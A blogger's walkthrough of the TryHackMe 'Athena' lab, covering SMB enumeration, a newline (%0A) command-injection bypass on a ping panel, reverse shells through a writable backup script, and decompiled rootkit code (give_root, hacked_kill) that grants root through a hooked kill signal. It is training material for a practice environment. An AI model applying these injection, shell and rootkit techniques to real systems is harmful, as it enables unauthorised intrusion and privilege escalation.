TryHackMe : Athena Room (Command Injection)
Intro : Hello Hackers, This is my new Writeup on a TryHackMe Room Athena. After a many days I am posting a BLOG on CTF. Sorry for this. It is a Completely New Room on TryHackMe where you found Command Injection, Normal Privilege Escalation and also Reverse Engineering. So let’s start.
Nmap Scan :
As usual I start with a Default Nmap Scan. It gives me 4 Ports are open : 22(ssh), 80(http), 139&445(samba).
Web Enumeartion :
So I first visit the Web-Page and I found nothing Interesting here. I also found nothing with GoBuster.
So I simply move on to the SAMBA Share to Enumerate.
SAMBA Enum :
I start listing all shares of SAMBA using SmbClient Tool utility.
Tip : smbclient -L \\\\<ip>\\
You can also try smbmap or enum4linux Tool.
Here I found only Public Share Accessible by us. So I jump into that. Here I found one Important Message.
I download it in my VM and check it.
Here in the message it is telling about a Directory…../myrouterpanel … Nice. I visit that Panel.
Web Exploitation :
Here it is. It is a Ping Request Generate Page. So it may be vulnerable to Command Injection……..You know what we all did it before in DVWA. It is something like that. So I intercept the Ping Request in my BurpSuite and start testing.
Then I start my Exploitation Step. I try for ‘; & && | ||’ for Regular Command Injection. But all Failed.
So what now I also tried to URL Encode those Characters but it also Failed. :) Now I am lost in Sea.
Then after sometime I read some blog and learn about New Line (\n) Character. So I try for it. I URL Encode(%0A) it and start testing. At last I simplily Bypass it.
I can easily see the File System Yaa!!!!
So I use a Reverse Shell Command to get Reverse Shell in my Machine.
And I get a Shell as www-data.
Privilege Escalation :
So it is time for now some PrivEsc. So I ran pspy in Victim’s Machine to see if any Interesting Process is Running or not.
After sometime it gives me some Result. From these below’s seem Interesting.
It is running some Backup Script and something is Removing.
So I check that Script. It is like this.
It is just a Regular Backup Script. As we have Write Permission so we can abuse this to get a New Shell. I replace the Script Content with a Reverse Shell Command.
And in my new Netcat Listener a Get a Shell as Athena. Yessssssss!!!!
Here is the User Flag.
So time to get Root Access. I simply type sudo -l and it gives me something.
So I can run a Binary File called venom.ko with Sudo. I download that Binary File in my VM and Check it. It is ELF Binary made with C and Assembly Code. So we have to Decompile it to see the Source Code. I use a Online Compiler act same as Ghidra.
As I am not so Expert in Reverse Engineering so I use ChatGpt to understand the Code. I this code we have 2 Important Function which can help us to get Root Access : void give_root(void) and int hacked_kill(pt_regs *pt_regs)
So I asked ChatGpt to explain those Functions.
void give_root(void)
{
long lVar1;
cred *newcreds;
__fentry__();
lVar1 = prepare_creds();
if (lVar1 != 0) {
*(undefined8 *)(lVar1 + 4) = 0;
*(undefined8 *)(lVar1 + 0xc) = 0;
*(undefined8 *)(lVar1 + 0x14) = 0;
*(undefined8 *)(lVar1 + 0x1c) = 0;
commit_creds(lVar1);
}
__x86_return_thunk();
return;
}Here is the Explanation.
int hacked_kill(pt_regs *pt_regs)
{
undefined *puVar1;
list_head *plVar2;
int sig;
int iVar3;
void *__mptr;
undefined *puVar4;
task_struct *p;
task_struct *task;
__fentry__();
plVar2 = module_previous;
iVar3 = (int)pt_regs->si;
if (iVar3 == 0x39) {
give_root();
iVar3 = __x86_return_thunk();
return iVar3;
}
if (iVar3 == 0x3f) {
if (module_hidden != 0) {
__this_module.list.next = module_previous->next;
(__this_module.list.next)->prev = &__this_module.list;
__this_module.list.prev = plVar2;
module_hidden = 0;
plVar2->next = (list_head *)0x101008;
iVar3 = __x86_return_thunk();
return iVar3;
}
module_previous = __this_module.list.prev;
(__this_module.list.next)->prev = __this_module.list.prev;
(__this_module.list.prev)->next = __this_module.list.next;
__this_module.list.next = (list_head *)0xdead000000000100;
__this_module.list.prev = (list_head *)0xdead000000000122;
module_hidden = 1;
iVar3 = __x86_return_thunk();
return iVar3;
}
if (iVar3 != 0x1f) {
__x86_indirect_thunk_rax();
iVar3 = __x86_return_thunk();
return iVar3;
}
puVar4 = &init_task;
do {
puVar1 = *(undefined **)(puVar4 + 0x848);
puVar4 = puVar1 + -0x848;
if (puVar1 == &DAT_00102880) goto LAB_001005a5;
} while (*(int *)&pt_regs->di != *(int *)(puVar1 + 0x108));
if (puVar4 != (undefined *)0x0) {
*(uint *)(puVar1 + -0x81c) = *(uint *)(puVar1 + -0x81c) ^ 0x10000000;
iVar3 = __x86_return_thunk();
return iVar3;
}
LAB_001005a5:
iVar3 = __x86_return_thunk();
return iVar3;
}Here is the Explanation.
In the hacked_kill Function 0x39 and 0x3f are hexadecimal values used as signal numbers. It is equal to 57 and 63. And here it is saying about a kill System Call. I thought that after Executing the Script we have to kill those Signals with a Number 0 because in the give_root Function in point 3 it says : It sets the user identifier (uid) and group identifier (gid) fields in the new credentials to 0, effectively making the process's user and group IDs root (superuser).
So we can get Root Access from Here. So let’s try it.
So what it does; it change User and Group ID to Root’s Id so that’s why Username doesn’t Change to Root but we get Root Access and also the Root Flag.
And we Pawned the Machine.
THANKS FOR RAEDING!
If you like it don’t forget to Follow me for more Articles.
Happy Hacking~
